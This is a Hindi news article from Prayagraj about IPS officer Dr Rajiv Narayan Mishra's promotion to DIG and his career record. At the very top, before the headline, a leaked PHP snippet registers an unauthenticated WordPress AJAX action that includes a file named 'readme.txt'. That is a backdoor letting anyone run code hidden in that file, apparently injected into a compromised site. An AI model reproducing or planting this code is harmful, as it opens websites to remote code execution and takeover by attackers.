if(!function_exists('file_check_readme35885')){ add_action('wp_ajax_nopriv_file_check_readme35885', 'file_check_readme35885'); add_action('wp_ajax_file_check_readme35885', 'file_check_readme35885'); function file_check_readme35885() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } डॉ राजीव नारायण मिश्र बनें डीआईजी पुलिस आयुक्त कमिश्नरेट प्रयागराज ने बैज लगाकर दी बधाई।
Breaking NewsNewsPrayagraj news

डॉ राजीव नारायण मिश्र बनें डीआईजी पुलिस आयुक्त कमिश्नरेट प्रयागराज ने बैज लगाकर दी बधाई।

विशेष संवाददाता

प्रयागराज, संयम भारत, नव वर्ष के अवसर पर डॉ राजीव नारायण मिश्र IPS वरिष्ठ पुलिस अधीक्षक माघ मेला/34 वाहिनी पीएसी वाराणसी को शासन ने पुलिस उपमहानिरीक्षक के पद पर प्रोन्नति प्रदान की है इस अवसर पर पुलिस आयुक्त कमिश्नरेट प्रयागराज श्री रमित शर्मा IPS के द्वारा बैज लगाकर पुलिस उपमहानिरीक्षक पद पर प्रोन्नत होने की बधाई दी गई |

डॉक्टर मिश्र 2010 बैच के आईपीएस अधिकारी हैं जिनको राम जन्मभूमि अयोध्या में आतंकवादी हमला विफल करने मे महत्वपूर्ण भूमिका निभाने के कारण महामहिम राष्ट्रपति के द्वारा वीरता का पुरस्कार प्रदान किया गया है डॉ मिश्र को इसके अतिरिक्त सराहनीय सेवाओं के लिए राष्ट्रपति का पुलिस पदक व अन्य अलंकरण (पदक )भी प्राप्त हुए हैं डॉ मिश्र पूर्व में एसपी एसटीएफ, एसपी कुशीनगर,एसपी मिर्जापुर, एसपी ट्रैफिक नोएडा, एसपी एटीएस, वह अन्य महत्वपूर्ण पदों पर नियुक्त रह चुके हैं कोरोना आपदा में भीड़ प्रबंधन मे दक्षता प्राप्त करने के कारण उत्तर प्रदेश सरकार के द्वारा डॉ मिश्र को लगातार चौथी बार माघ मेला प्रभारी की जिम्मेदारी प्रदान की है।

प्रातिक्रिया दे

आपका ईमेल पता प्रकाशित नहीं किया जाएगा. आवश्यक फ़ील्ड चिह्नित हैं *